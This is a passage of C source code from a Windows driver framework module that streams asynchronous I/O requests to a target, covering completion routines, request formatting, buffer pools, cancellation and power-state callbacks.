ntStatus); DmfAssert(bufferDisposition > ContinuousRequestTarget_BufferDisposition_Invalid); DmfAssert(bufferDisposition < ContinuousRequestTarget_BufferDisposition_Maximum); } if (((bufferDisposition == ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndContinueStreaming) || (bufferDisposition == ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndStopStreaming)) && (outputBuffer != NULL)) { // The Client indicates that it is finished with the buffer. So return it back to the // list of output buffers. // DMF_BufferPool_Put(moduleContext->DmfModuleBufferPoolOutput, outputBuffer); } } else { if ((!NT_SUCCESS(ntStatus)) || (moduleContext->Stopping)) { bufferDisposition = ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndStopStreaming; } else { bufferDisposition = ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndContinueStreaming; } } // Input buffer will be NULL for Request types Read and Write. // if (inputBuffer != NULL) { // Always return the Input Buffer back to the Input Buffer List. // DMF_BufferPool_Put(moduleContext->DmfModuleBufferPoolInput, inputBuffer); } if (((bufferDisposition == ContinuousRequestTarget_BufferDisposition_ContinuousRequestTargetAndContinueStreaming) || (bufferDisposition == ContinuousRequestTarget_BufferDisposition_ClientAndContinueStreaming)) ) { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p Send again", Request); ntStatus = ContinuousRequestTarget_StreamRequestSend(DmfModule, Request); if (!NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_StreamRequestSend fails: ntStatus=%!STATUS! Request=0x%p", ntStatus, Request); } else { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "ContinuousRequestTarget_StreamRequestSend success: ntStatus=%!STATUS! Request=0x%p", ntStatus, Request); } } else { ntStatus = STATUS_CANCELLED; TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "Cancel due to callback: ntStatus=%!STATUS! Request=0x%p", ntStatus, Request); } if (!NT_SUCCESS(ntStatus)) { #if ! defined(DMF_USER_MODE) // This request stream has stopped so reduce the total count // ContinuousRequestTarget_DecreaseStreamRequestCount(moduleContext); #endif // Remove on decrement so we know what requests are still outstanding. // WdfCollectionRemove(moduleContext->TransientStreamRequestsCollection, Request); } else { #if ! defined(DMF_USER_MODE) TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [No decrement]", Request); #endif } // Request has returned. Decrement. // InterlockedDecrement(&moduleContext->PendingStreamingRequests); DMF_ModuleDereference(DmfModule); FuncExitVoid(DMF_TRACE); } EVT_WDF_REQUEST_COMPLETION_ROUTINE ContinuousRequestTarget_StreamCompletionRoutine; _Function_class_(EVT_WDF_REQUEST_COMPLETION_ROUTINE) _IRQL_requires_same_ VOID ContinuousRequestTarget_StreamCompletionRoutine( _In_ WDFREQUEST Request, _In_ WDFIOTARGET Target, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ WDFCONTEXT Context ) /*++ Routine Description: It is the completion routine for the Asynchronous requests. This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers so that the Client can do Client specific processing. Arguments: Request - The completed request. Target - The Io Target that completed the request. CompletionParams - Information about the completion. Context - This Module's handle. Return Value: None --*/ { DMFMODULE dmfModule; UNREFERENCED_PARAMETER(Target); FuncEntry(DMF_TRACE); dmfModule = DMFMODULEVOID_TO_MODULE(Context); ContinuousRequestTarget_ProcessAsynchronousRequestStream(dmfModule, Request, CompletionParams); FuncExitVoid(DMF_TRACE); } EVT_WDF_REQUEST_COMPLETION_ROUTINE ContinuousRequestTarget_StreamCompletionRoutinePassive; _Function_class_(EVT_WDF_REQUEST_COMPLETION_ROUTINE) _IRQL_requires_same_ VOID ContinuousRequestTarget_StreamCompletionRoutinePassive( _In_ WDFREQUEST Request, _In_ WDFIOTARGET Target, _In_ PWDF_REQUEST_COMPLETION_PARAMS CompletionParams, _In_ WDFCONTEXT Context ) /*++ Routine Description: It is the completion routine for the Asynchronous requests. This routine does all the work to extract the buffers that are returned from underlying target. Then it calls the Client's Output Buffer callback function with the buffers so that the Client can do Client specific processing. Arguments: Request - The completed request. Target - The Io Target that completed the request. CompletionParams - Information about the completion. Context - This Module's handle. Return Value: None --*/ { DMFMODULE dmfModule; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; ContinuousRequestTarget_QueuedWorkitemContext workitemContext; UNREFERENCED_PARAMETER(Target); FuncEntry(DMF_TRACE); dmfModule = DMFMODULEVOID_TO_MODULE(Context); moduleContext = DMF_CONTEXT_GET(dmfModule); workitemContext.Request = Request; workitemContext.RequestCompletionParams = *CompletionParams; DMF_QueuedWorkItem_Enqueue(moduleContext->DmfModuleQueuedWorkitemStream, (VOID*)&workitemContext, sizeof(ContinuousRequestTarget_QueuedWorkitemContext)); } static NTSTATUS ContinuousRequestTarget_FormatRequestForRequestType( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request, _In_ ContinuousRequestTarget_RequestType RequestType, _In_ ULONG RequestIoctlCode, _In_opt_ WDFMEMORY InputMemory, _In_opt_ WDFMEMORY OutputMemory ) /*++ Routine Description: Format the Request based on Request Type specified in Module Config. Arguments: DmfModule - This Module's handle. Request - The request to format. RequestIoctlCode - IOCTL code for Request type ContinuousRequestTarget_RequestType_Ioctl or ContinuousRequestTarget_RequestType_InternalIoctl InputMemory - Handle to framework memory object which contains input data OutputMemory - Handle to framework memory object to receive output data Return Value: None --*/ { NTSTATUS ntStatus = STATUS_SUCCESS; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); // Prepare the request to be sent down. // DmfAssert(moduleContext->IoTarget != NULL); switch (RequestType) { case ContinuousRequestTarget_RequestType_Write: { ntStatus = WdfIoTargetFormatRequestForWrite(moduleContext->IoTarget, Request, InputMemory, NULL, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfIoTargetFormatRequestForWrite fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } break; } case ContinuousRequestTarget_RequestType_Read: { ntStatus = WdfIoTargetFormatRequestForRead(moduleContext->IoTarget, Request, OutputMemory, NULL, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfIoTargetFormatRequestForRead fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } break; } case ContinuousRequestTarget_RequestType_Ioctl: { ntStatus = WdfIoTargetFormatRequestForIoctl(moduleContext->IoTarget, Request, RequestIoctlCode, InputMemory, NULL, OutputMemory, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfIoTargetFormatRequestForIoctl fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } break; } #if !defined(DMF_USER_MODE) case ContinuousRequestTarget_RequestType_InternalIoctl: { ntStatus = WdfIoTargetFormatRequestForInternalIoctl(moduleContext->IoTarget, Request, RequestIoctlCode, InputMemory, NULL, OutputMemory, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfIoTargetFormatRequestForInternalIoctl fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } break; } #endif // !defined(DMF_USER_MODE) default: { ntStatus = STATUS_INVALID_PARAMETER; TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "Invalid RequestType:%d fails: ntStatus=%!STATUS!", RequestType, ntStatus); goto Exit; } } Exit: FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } static NTSTATUS ContinuousRequestTarget_CreateBuffersAndFormatRequestForRequestType( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request ) /*++ Routine Description: Create the required input and output buffers and format the Request based on Request Type specified in Module Config. Arguments: DmfModule - This Module's handle. Request - The request to format. Return Value: None --*/ { NTSTATUS ntStatus = STATUS_SUCCESS; WDFMEMORY requestOutputMemory; WDFMEMORY requestInputMemory; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; VOID* inputBuffer; size_t inputBufferSize; VOID* outputBuffer; VOID* inputBufferContext; VOID* outputBufferContext; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); // Create the input buffer for the request if the Client needs one. // requestInputMemory = NULL; if (moduleConfig->BufferInputSize > 0) { // Get an input buffer from the input buffer list. // NOTE: This is fast operation that involves only pointer manipulation unless the buffer list is empty // (which should not happen). // ntStatus = DMF_BufferPool_GetWithMemory(moduleContext->DmfModuleBufferPoolInput, &inputBuffer, &inputBufferContext, &requestInputMemory); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "DMF_BufferPool_GetWithMemory fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } inputBufferSize = moduleConfig->BufferInputSize; moduleConfig->EvtContinuousRequestTargetBufferInput(DmfModule, inputBuffer, &inputBufferSize, inputBufferContext); DmfAssert(inputBufferSize <= moduleConfig->BufferInputSize); } // Create the output buffer for the request if the Client needs one. // requestOutputMemory = NULL; if (moduleConfig->BufferOutputSize > 0) { // Get an output buffer from the output buffer list. // NOTE: This is fast operation that involves only pointer manipulation unless the buffer list is empty // (which should not happen). // ntStatus = DMF_BufferPool_GetWithMemory(moduleContext->DmfModuleBufferPoolOutput, &outputBuffer, &outputBufferContext, &requestOutputMemory); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "DMF_BufferPool_GetWithMemory fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } } ntStatus = ContinuousRequestTarget_FormatRequestForRequestType(DmfModule, Request, moduleConfig->RequestType, moduleConfig->ContinuousRequestTargetIoctl, requestInputMemory, requestOutputMemory); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_FormatRequestForRequestType fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } Exit: FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } static NTSTATUS ContinuousRequestTarget_StreamRequestSend( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request ) /*++ Routine Description: Send a single asynchronous request down the stack. Arguments: DmfModule - This Module's handle. Request - The request to send or NULL if the request should be created. Return Value: None --*/ { NTSTATUS ntStatus; BOOLEAN requestSendResult; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); // A new request will be sent down the stack. Count it so we can verify when // it returns. // InterlockedIncrement(&moduleContext->PendingStreamingRequests); DMF_ModuleReference(DmfModule); #if !defined(DMF_USER_MODE) // A new request will be sent down the stack. Increase Rundown ref until // send request has been made. // if (DMF_Portable_Rundown_Acquire(&moduleContext->StreamRequestsRundown)) { #endif // Reuse the request // WDF_REQUEST_REUSE_PARAMS requestParams; WDF_REQUEST_REUSE_PARAMS_INIT(&requestParams, WDF_REQUEST_REUSE_NO_FLAGS, STATUS_SUCCESS); ntStatus = WdfRequestReuse(Request, &requestParams); // Simple reuse cannot fail. // DmfAssert(NT_SUCCESS(ntStatus)); ntStatus = ContinuousRequestTarget_CreateBuffersAndFormatRequestForRequestType(DmfModule, Request); if (NT_SUCCESS(ntStatus)) { // Set a CompletionRoutine callback function. It goes back into this Module which will // dispatch to the Client. // WdfRequestSetCompletionRoutine(Request, moduleContext->CompletionRoutineStream, (WDFCONTEXT) (DmfModule)); // Send the request - Asynchronous call, so check for Status if it fails. // If it succeeds, the Status will be checked in Completion Routine. // requestSendResult = WdfRequestSend(Request, moduleContext->IoTarget, WDF_NO_SEND_OPTIONS); if (! requestSendResult) { ntStatus = WdfRequestGetStatus(Request); DmfAssert(!NT_SUCCESS(ntStatus)); TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestSend fails: ntStatus=%!STATUS!", ntStatus); } } else { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_CreateBuffersAndFormatRequestForRequestType fails: ntStatus=%!STATUS!", ntStatus); } #if !defined(DMF_USER_MODE) DMF_Portable_Rundown_Release(&moduleContext->StreamRequestsRundown); } else { ntStatus = STATUS_CANCELLED; } #endif if (!NT_SUCCESS(ntStatus)) { // Unable to send the request. Decrement to account for the increment above. // InterlockedDecrement(&moduleContext->PendingStreamingRequests); DMF_ModuleDereference(DmfModule); } FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } // 'Returning uninitialized memory' // #pragma warning(suppress:6101) static NTSTATUS ContinuousRequestTarget_RequestCreateAndSend( _In_ DMFMODULE DmfModule, _In_ BOOLEAN IsSynchronousRequest, _In_ VOID* RequestBuffer, _In_ size_t RequestLength, _Out_ VOID* ResponseBuffer, _In_ size_t ResponseLength, _In_ ContinuousRequestTarget_RequestType RequestType, _In_ ULONG RequestIoctl, _In_ ULONG RequestTimeoutMilliseconds, _In_ ContinuousRequestTarget_CompletionOptions CompletionOption, _Out_opt_ size_t* BytesWritten, _In_opt_ EVT_DMF_ContinuousRequestTarget_SendCompletion* EvtContinuousRequestTargetSingleAsynchronousRequest, _In_opt_ VOID* SingleAsynchronousRequestClientContext ) /*++ Routine Description: Creates and sends a synchronous request to the IoTarget given a buffer, IOCTL and other information. Arguments: DmfModule - This Module's handle. RequestBuffer - Buffer of data to attach to request to be sent. RequestLength - Number of bytes to in RequestBuffer to send. ResponseBuffer - Buffer of data that is returned by the request. ResponseLength - Size of Response Buffer in bytes. RequestIoctl - The given IOCTL. RequestTimeoutMilliseconds - Timeout value in milliseconds of the transfer or zero for no timeout. CompletionOption - Completion option associated with the completion routine. BytesWritten - Bytes returned by the transaction. EvtContinuousRequestTargetSingleAsynchronousRequest - Completion routine. SingleAsynchronousRequestClientContext - Client context returned in completion routine. Return Value: STATUS_SUCCESS if a buffer is added to the list. Other NTSTATUS if there is an error. --*/ { NTSTATUS ntStatus; WDFREQUEST request; WDFMEMORY memoryForRequest; WDFMEMORY memoryForResponse; WDF_OBJECT_ATTRIBUTES requestAttributes; WDF_OBJECT_ATTRIBUTES memoryAttributes; WDF_REQUEST_SEND_OPTIONS sendOptions; size_t outputBufferSize; BOOLEAN requestSendResult; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; WDFDEVICE device; EVT_WDF_REQUEST_COMPLETION_ROUTINE* completionRoutineSingle; ContinuousRequestTarget_SingleAsynchronousRequestContext* singleAsynchronousRequestContext; VOID* singleBufferContext; FuncEntry(DMF_TRACE); outputBufferSize = 0; requestSendResult = FALSE; DmfAssert((IsSynchronousRequest && (EvtContinuousRequestTargetSingleAsynchronousRequest == NULL)) || (! IsSynchronousRequest)); moduleContext = DMF_CONTEXT_GET(DmfModule); DmfAssert(moduleContext->IoTarget != NULL); device = DMF_ParentDeviceGet(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); WDF_OBJECT_ATTRIBUTES_INIT(&requestAttributes); requestAttributes.ParentObject = device; request = NULL; ntStatus = WdfRequestCreate(&requestAttributes, moduleContext->IoTarget, &request); if (! NT_SUCCESS(ntStatus)) { request = NULL; TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestCreate fails: ntStatus=%!STATUS!", ntStatus); return ntStatus; } WDF_OBJECT_ATTRIBUTES_INIT(&memoryAttributes); memoryAttributes.ParentObject = request; memoryForRequest = NULL; if (RequestLength > 0) { DmfAssert(RequestBuffer != NULL); ntStatus = WdfMemoryCreatePreallocated(&memoryAttributes, RequestBuffer, RequestLength, &memoryForRequest); if (! NT_SUCCESS(ntStatus)) { memoryForRequest = NULL; TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfMemoryCreate fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } } memoryForResponse = NULL; if (ResponseLength > 0) { DmfAssert(ResponseBuffer != NULL); ntStatus = WdfMemoryCreatePreallocated(&memoryAttributes, ResponseBuffer, ResponseLength, &memoryForResponse); if (! NT_SUCCESS(ntStatus)) { memoryForResponse = NULL; TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfMemoryCreate for position fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } } ntStatus = ContinuousRequestTarget_FormatRequestForRequestType(DmfModule, request, RequestType, RequestIoctl, memoryForRequest, memoryForResponse); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_FormatRequestForRequestType fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } if (IsSynchronousRequest) { WDF_REQUEST_SEND_OPTIONS_INIT(&sendOptions, WDF_REQUEST_SEND_OPTION_SYNCHRONOUS | WDF_REQUEST_SEND_OPTION_TIMEOUT); } else { WDF_REQUEST_SEND_OPTIONS_INIT(&sendOptions, WDF_REQUEST_SEND_OPTION_TIMEOUT); // Get a single buffer from the single buffer list. // NOTE: This is fast operation that involves only pointer manipulation unless the buffer list is empty // (which should not happen). // ntStatus = DMF_BufferPool_Get(moduleContext->DmfModuleBufferPoolContext, (VOID**)&singleAsynchronousRequestContext, &singleBufferContext); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "DMF_BufferPool_GetWithMemory fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } if (CompletionOption == ContinuousRequestTarget_CompletionOptions_Default) { completionRoutineSingle = ContinuousRequestTarget_CompletionRoutine; } else if (CompletionOption == ContinuousRequestTarget_CompletionOptions_Passive) { completionRoutineSingle = ContinuousRequestTarget_CompletionRoutinePassive; } else { completionRoutineSingle = ContinuousRequestTarget_CompletionRoutine; DmfAssert(FALSE); } singleAsynchronousRequestContext->DmfModule = DmfModule; singleAsynchronousRequestContext->SingleAsynchronousCallbackClientContext = SingleAsynchronousRequestClientContext; singleAsynchronousRequestContext->EvtContinuousRequestTargetSingleAsynchronousRequest = EvtContinuousRequestTargetSingleAsynchronousRequest; singleAsynchronousRequestContext->SingleAsynchronousRequestType = RequestType; // Set the completion routine to internal completion routine of this Module. // WdfRequestSetCompletionRoutine(request, completionRoutineSingle, singleAsynchronousRequestContext); } WDF_REQUEST_SEND_OPTIONS_SET_TIMEOUT(&sendOptions, WDF_REL_TIMEOUT_IN_MS(RequestTimeoutMilliseconds)); ntStatus = WdfRequestAllocateTimer(request); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestAllocateTimer fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } requestSendResult = WdfRequestSend(request, moduleContext->IoTarget, &sendOptions); if (! requestSendResult || IsSynchronousRequest) { ntStatus = WdfRequestGetStatus(request); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestGetStatus returned ntStatus=%!STATUS!", ntStatus); goto Exit; } else { TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "WdfRequestSend completed with ntStatus=%!STATUS!", ntStatus); outputBufferSize = WdfRequestGetInformation(request); } } Exit: if (BytesWritten != NULL) { *BytesWritten = outputBufferSize; } if (IsSynchronousRequest && request != NULL) { // Delete the request if its Synchronous. // WdfObjectDelete(request); request = NULL; } else if (! IsSynchronousRequest && ! NT_SUCCESS(ntStatus) && request != NULL) { // Delete the request if Asynchronous request failed. // WdfObjectDelete(request); request = NULL; } FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } #pragma code_seg() ScheduledTask_Result_Type ContinuousRequestTarget_QueuedWorkitemCallbackSingle( _In_ DMFMODULE DmfModule, _In_ VOID* ClientBuffer, _In_ VOID* ClientBufferContext ) /*++ Routine Description: This routine does the work of completion routine for single asynchronous request, at passive level. Arguments: DmfModule - The QueuedWorkItem Dmf Module. ClientBuffer - The buffer that contains the context of work to be done. ClientBufferContext - Context associated with the buffer. Return Value: None --*/ { DMFMODULE dmfModuleParent; ContinuousRequestTarget_QueuedWorkitemContext* workitemContext; UNREFERENCED_PARAMETER(ClientBufferContext); dmfModuleParent = DMF_ParentModuleGet(DmfModule); workitemContext = (ContinuousRequestTarget_QueuedWorkitemContext*)ClientBuffer; ContinuousRequestTarget_ProcessAsynchronousRequestSingle(dmfModuleParent, workitemContext->Request, &workitemContext->RequestCompletionParams, workitemContext->SingleAsynchronousRequestContext); return ScheduledTask_WorkResult_Success; } ScheduledTask_Result_Type ContinuousRequestTarget_QueuedWorkitemCallbackStream( _In_ DMFMODULE DmfModule, _In_ VOID* ClientBuffer, _In_ VOID* ClientBufferContext ) /*++ Routine Description: This routine does the work of completion routine for stream asynchronous requests, at passive level. Arguments: DmfModule - The QueuedWorkItem Dmf Module. ClientBuffer - The buffer that contains the context of work to be done. ClientBufferContext - Context associated with the buffer. Return Value: None --*/ { DMFMODULE dmfModuleParent; ContinuousRequestTarget_QueuedWorkitemContext* workitemContext; UNREFERENCED_PARAMETER(ClientBufferContext); dmfModuleParent = DMF_ParentModuleGet(DmfModule); workitemContext = (ContinuousRequestTarget_QueuedWorkitemContext*)ClientBuffer; TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [Queued Callback]", workitemContext->Request); ContinuousRequestTarget_ProcessAsynchronousRequestStream(dmfModuleParent, workitemContext->Request, &workitemContext->RequestCompletionParams); return ScheduledTask_WorkResult_Success; } _IRQL_requires_max_(DISPATCH_LEVEL) VOID ContinuousRequestTarget_RequestsCancel( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Cancel all the outstanding requests. Arguments: DmfModule - This Module's handle. Return Value: None --*/ { DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; WDFREQUEST request; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); // Tell the rest of the Module that Client has stopped streaming. // (It is possible this is called twice if removal of WDFIOTARGET occurs on stream that starts/stops // automatically. // moduleContext->Stopping = TRUE; // Cancel all requests from target. Do not wait until all pending requests have returned. // #if !defined(DMF_USER_MODE) // 1. Make sure no new request will be sent. // TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "Start Rundown"); DMF_Portable_Rundown_WaitForRundownProtectionRelease(&moduleContext->StreamRequestsRundown); DMF_Portable_Rundown_Completed(&moduleContext->StreamRequestsRundown); #endif // 2. Cancel any pending WDF requests. // // NOTE: There is not need to lock because these requests always exist in this list. // NOTE: Get total number from Config in case it has already started decrementing StreamRequestCount; // LONG requestsToCancel = (LONG)moduleConfig->ContinuousRequestCount; DmfAssert(moduleContext->StreamingRequestCount <= requestsToCancel); TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Cancel Pending Requests: START requestsToCancel=%d", requestsToCancel); for (LONG requestIndex = 0; requestIndex < requestsToCancel; requestIndex++) { request = (WDFREQUEST)WdfCollectionGetItem(moduleContext->CreatedStreamRequestsCollection, requestIndex); TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "WdfRequestCancelSentRequest Request[%d]=0x%p", requestIndex, request); WdfRequestCancelSentRequest(request); } TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Cancel Pending Requests: END"); FuncExitVoid(DMF_TRACE); } _IRQL_requires_max_(PASSIVE_LEVEL) VOID ContinuousRequestTarget_StopAndWait( _In_ DMFMODULE DmfModule ) /*++ Routine Description: Stops streaming Asynchronous requests to the IoTarget and waits for all pending requests to return. Arguments: DmfModule - This Module's handle. Return Value: None --*/ { DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); DmfAssert(moduleContext->IoTarget != NULL); // Tell the rest of the Module that Client has stopped streaming. // (It is possible this is called twice if removal of WDFIOTARGET occurs on stream that starts/stops // automatically. // moduleContext->Stopping = TRUE; // Cancel all the outstanding requests. // ContinuousRequestTarget_RequestsCancel(DmfModule); TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "Wait for in-flight callback"); // 3. Wait for any in-flight callback to return. // #if !defined(DMF_USER_MODE) DMF_Portable_EventWaitForSingleObject(&moduleContext->StreamRequestsRundownCompletionEvent, FALSE, NULL); #else // Once Rundown API is supported in User-mode, this code can be deleted. // while (moduleContext->PendingStreamingRequests > 0) { DMF_Utility_DelayMilliseconds(50); } #endif TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "Rundown Completed"); FuncExitVoid(DMF_TRACE); } /////////////////////////////////////////////////////////////////////////////////////////////////////// // WDF Module Callbacks /////////////////////////////////////////////////////////////////////////////////////////////////////// // _IRQL_requires_max_(PASSIVE_LEVEL) _Must_inspect_result_ static NTSTATUS DMF_ContinuousRequestTarget_ModuleD0Entry( _In_ DMFMODULE DmfModule, _In_ WDF_POWER_DEVICE_STATE PreviousState ) /*++ Routine Description: Callback for ModuleD0Entry for a this Module. Some Clients require streaming to stop during D0Exit/D0Entry transitions. This code does that work on behalf of the Client. Arguments: DmfModule - The given DMF Module. PreviousState - The WDF Power State that this DMF Module should exit from. Return Value: NTSTATUS --*/ { NTSTATUS ntStatus = STATUS_SUCCESS; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); // Send each WDFREQUEST this Module's instance has created to // its WDFIOTARGET. // if ((moduleConfig->CancelAndResendRequestInD0Callbacks) && (moduleContext->IoTarget != NULL)) { if (PreviousState == WdfPowerDeviceD3Final) { ntStatus = STATUS_SUCCESS; } else { ntStatus = DMF_ContinuousRequestTarget_Start(DmfModule); } } // Start the target on any power transition other than cold boot. // if the PurgeAndStartTargetInD0Callbacks is set to true. // if ((moduleConfig->PurgeAndStartTargetInD0Callbacks) && (moduleContext->IoTarget != NULL)) { if (PreviousState == WdfPowerDeviceD3Final) { ntStatus = STATUS_SUCCESS; } else { ntStatus = WdfIoTargetStart(moduleContext->IoTarget); } } FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } _IRQL_requires_max_(PASSIVE_LEVEL) _Must_inspect_result_ static NTSTATUS DMF_ContinuousRequestTarget_ModuleD0Exit( _In_ DMFMODULE DmfModule, _In_ WDF_POWER_DEVICE_STATE TargetState ) /*++ Routine Description: Callback for ModuleD0Exit for this Module. Some Clients require streaming to stop during D0Exit/D0Entry transitions. This code does that work on behalf of the Client. Arguments: DmfModule - The given DMF Module. TargetState - The WDF Power State that this DMF Module will enter. Return Value: None --*/ { NTSTATUS ntStatus = STATUS_SUCCESS; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; FuncEntry(DMF_TRACE); UNREFERENCED_PARAMETER(TargetState); moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); if ((moduleConfig->CancelAndResendRequestInD0Callbacks) && (moduleContext->IoTarget != NULL)) { DMF_ContinuousRequestTarget_StopAndWait(DmfModule); } if ((moduleConfig->PurgeAndStartTargetInD0Callbacks) && (moduleContext->IoTarget != NULL)) { WdfIoTargetPurge(moduleContext->IoTarget, WdfIoTargetPurgeIoAndWait); } FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } /////////////////////////////////////////////////////////////////////////////////////////////////////// // DMF Module Callbacks /////////////////////////////////////////////////////////////////////////////////////////////////////// // #pragma code_seg("PAGE") _IRQL_requires_max_(PASSIVE_LEVEL) VOID DMF_ContinuousRequestTarget_ChildModulesAdd( _In_ DMFMODULE DmfModule, _In_ DMF_MODULE_ATTRIBUTES* DmfParentModuleAttributes, _In_ PDMFMODULE_INIT DmfModuleInit ) /*++ Routine Description: Configure and add the required Child Modules to the given Parent Module. Arguments: DmfModule - The given Parent Module. DmfParentModuleAttributes - Pointer to the parent DMF_MODULE_ATTRIBUTES structure. DmfModuleInit - Opaque structure to be passed to DMF_DmfModuleAdd. Return Value: None --*/ { DMF_MODULE_ATTRIBUTES moduleAttributes; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_BufferPool moduleConfigBufferPoolInput; DMF_CONFIG_BufferPool moduleConfigBufferPoolOutput; DMF_CONFIG_BufferPool moduleConfigBufferPoolContext; DMF_CONFIG_QueuedWorkItem moduleConfigQueuedWorkItemStream; DMF_CONFIG_QueuedWorkItem moduleConfigQueuedWorkItemSingle; PAGED_CODE(); FuncEntry(DMF_TRACE); moduleConfig = DMF_CONFIG_GET(DmfModule); moduleContext = DMF_CONTEXT_GET(DmfModule); // Create buffer pools for input and output buffers only if they are needed. // if (moduleConfig->BufferInputSize > 0) { // BufferPoolInput // --------------- // DMF_CONFIG_BufferPool_AND_ATTRIBUTES_INIT(&moduleConfigBufferPoolInput, &moduleAttributes); moduleConfigBufferPoolInput.BufferPoolMode = BufferPool_Mode_Source; moduleConfigBufferPoolInput.Mode.SourceSettings.EnableLookAside = FALSE; moduleConfigBufferPoolInput.Mode.SourceSettings.BufferCount = moduleConfig->BufferCountInput; 